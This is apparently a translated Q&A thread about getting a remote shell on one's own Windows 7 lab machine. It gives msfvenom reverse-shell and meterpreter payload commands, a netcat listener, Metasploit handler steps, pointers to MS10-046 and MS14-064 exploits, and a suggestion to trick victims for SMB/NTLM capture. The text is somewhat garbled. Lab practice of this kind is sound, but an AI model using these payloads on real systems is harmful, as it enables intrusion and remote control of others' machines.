リモートシェルを取得するためにWindows 7を利用する必要があるプロジェクトやデモンストレーションがあります。
Windows 7マシンでnessusを使用して脆弱性スキャンを実行しましたが、目標を達成できるような種類の脆弱性は見つかりませんでした。
私のWindows 7マシンにインストールできるバッファオーバーフローを含む脆弱なサービスがあり、それを使用してそのマシンをmetasploitでリモートで悪用することができます。
詳細:
私が利用しようとしているマシンは私のものなので、すべてが合法です。
私は最新バージョンのmetasploitでUbuntu 15.10を使用しています(kaliリポジトリからインストールしました)。
私はこのftpを使用しました vulnerability (@halfinformedがコメントで私にくれました)。
だからここに簡単な逆シェルでインストールして悪用する手順があります:
msfvenom -a x86 --platform windows -p windows/Shell_reverse_tcp LHOST=your_ip_address LPORT=4444 -e x86/shikata_ga_nai -b "\x00\x0d\x0a\x3d\x5c\x2f" -i 3 -f python
を使用して、(IPアドレスに応じて)ニーズに合った新しいペイロードを生成します。nc -nlpv 4444
を使用して、別の端末でnetcatをリスニングします。python path_to_exlpoit_script.py
を使用してエクスプロイトスクリプトを起動します。Meterpreterペイロードで悪用したくない場合は、手順2と5を変更する必要があります。
このコマンドmsfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=your_ip_address LPORT=4444 -e x86/shikata_ga_nai -b "\x00\x0d\x0a\x3d\x5c\x2f" -i 3 -f python
を使用して、ニーズに合ったmeterpreterペイロードを生成します。
別の端末でmeterpreterで聞いてください。これを行うには、metasploitを開いてuse exploit/multi/handler
と入力します。次にset payload windows/meterpreter/reverse_tcp
;次にset lhost your_ip_address
;次にset lport 4444
;最後にexploit
。
Windows 7マシンに完全にパッチを適用/更新する必要がないことを前提として、ユーザーアカウント制御(UAC)を無効にしてWindows 7のバニラ(更新を適用しない)コピーを実行し、MS10-046を利用することができます。
MS10-046は重大な脆弱性であり、潜在的な攻撃者がローカルユーザーと同じレベルのユーザー権限を取得する可能性があります(ほとんどの平均的なジョーは管理者権限を持つアカウントを使用します)。この脆弱性は、Windows 7の32ビットバージョンと64ビットバージョンの両方に影響を及ぼします。
エクスプロイトは、悪意のあるダイナミックリンクライブラリ(DLL)ファイルを指すアイコンリソースを持つ.LNKファイルの処理に関連しています。
必要がバッファオーバーフローの脆弱性であるかどうかを明確に知らなくても、これでうまくいくか、意図的に脆弱性を残したMetasploitableのようなディストリビューションを使用することもできます。
Windows 7から8、そしておそらく10で利用可能なエクスプロイトがいくつかあります(MS14-064など)。
ここで検索できます: http://www.intelligentexploit.com/search-results.html?search=Microsoft+Windows
それ以外の場合は、マシンにインストールされているプログラムをターゲットにすることができます。 http://www.exploit-db.com を参照してください
それ以外の場合は、被害者をだましてターゲットサーバーにアクセスさせ、有名なSMB/NTLMキャプチャを常に試すことができます。
PS:私はここに2つ以上のリンクを追加できませんでしたが、DM me @haxorhead。